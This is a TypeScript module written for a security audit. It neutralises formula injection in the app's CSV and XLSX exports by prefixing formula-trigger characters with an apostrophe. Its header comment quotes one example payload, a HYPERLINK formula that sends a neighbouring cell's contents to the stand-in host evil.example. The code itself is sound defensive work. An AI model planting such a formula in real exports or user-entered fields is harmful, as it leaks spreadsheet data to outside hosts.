// SEQ-180 phase 2 (security audit, LOW): a downloaded spreadsheet must never
// execute what someone typed into the app.
//
// THE ATTACK. A project name, a widget name, a registry display name or a
// saved date preset name is free text. Excel, LibreOffice and Google Sheets
// all treat a cell whose text begins with `=`, `+`, `-` or `@` as a FORMULA,
// so a project named `=HYPERLINK("https://evil.example/?"&A1,"Click")` becomes
// a live link built from the row next to it the moment someone opens the
// export. Quoting for commas does not help: the value is still a formula once
// the parser has finished with the quotes. A leading tab or carriage return
// is on the same list because both are stripped before the formula test.
//
// THE FIX, which is the OWASP one: prefix the value with an apostrophe, which
// every spreadsheet reads as "the rest of this cell is literal text" and does
// not display. Applied to STRINGS only, so a negative number still exports as
// a number and still sorts and sums as one.
//
// Pure module, no React and no supabase import, so it is provable under Deno.

/** The characters a spreadsheet treats as the start of a formula. */
export const SPREADSHEET_FORMULA_TRIGGERS: readonly string[] = ["=", "+", "-", "@", "\t", "\r"];

/**
 * Makes one string safe to write into a spreadsheet cell. Returns the value
 * unchanged unless it begins with a formula trigger, in which case it gains a
 * leading apostrophe.
 */
export function neutraliseSpreadsheetFormula(value: string): string {
  if (value.length === 0) return value;
  return SPREADSHEET_FORMULA_TRIGGERS.includes(value[0]) ? `'${value}` : value;
}

/**
 * One CSV cell: numbers stay bare so a spreadsheet reads them as numbers,
 * strings are made formula-safe first and then quoted only when they carry a
 * quote, a comma or a newline.
 *
 * Order matters. Neutralising BEFORE quoting means the apostrophe sits inside
 * the quotes, where the spreadsheet will see it; doing it the other way round
 * would put the apostrophe outside the quoted field and change nothing.
 */
export function csvCell(value: string | number | null | undefined): string {
  if (value === null || value === undefined) return "";
  if (typeof value === "number") return String(value);

  const safe = neutraliseSpreadsheetFormula(value);
  const needsQuoting = /[",\n\r]/.test(safe);
  return needsQuoting ? `"${safe.replace(/"/g, '""')}"` : safe;
}

/**
 * One XLSX cell value. SheetJS only writes a formula when a cell carries an
 * `f` property, so a string is already inert there, but the value is
 * neutralised anyway: a user who copies a cell out of the sheet and pastes it
 * into another one lands back in the same trap, and the two export paths
 * agreeing is worth more than the one character saved.
 */
export function xlsxCell(value: string | number | null | undefined): string | number {
  if (value === null || value === undefined) return "";
  if (typeof value === "number") return value;
  return neutraliseSpreadsheetFormula(value);
}

/**
 * A whole array-of-arrays sheet made safe, header row included. `aoa_to_sheet`
 * takes rows exactly as given, so the neutralising has to happen before the
 * sheet is built rather than cell by cell afterwards.
 *
 * Kept here rather than inlined at each call site so the two export paths in
 * this codebase (the analytics table's `json_to_sheet` and the company
 * dashboard's `aoa_to_sheet`) cannot drift apart on what "safe" means.
 */
export function xlsxAoaRows(rows: readonly (readonly (string | number | null | undefined)[])[]): (string | number)[][] {
  return rows.map((row) => row.map((cell) => xlsxCell(cell)));
}
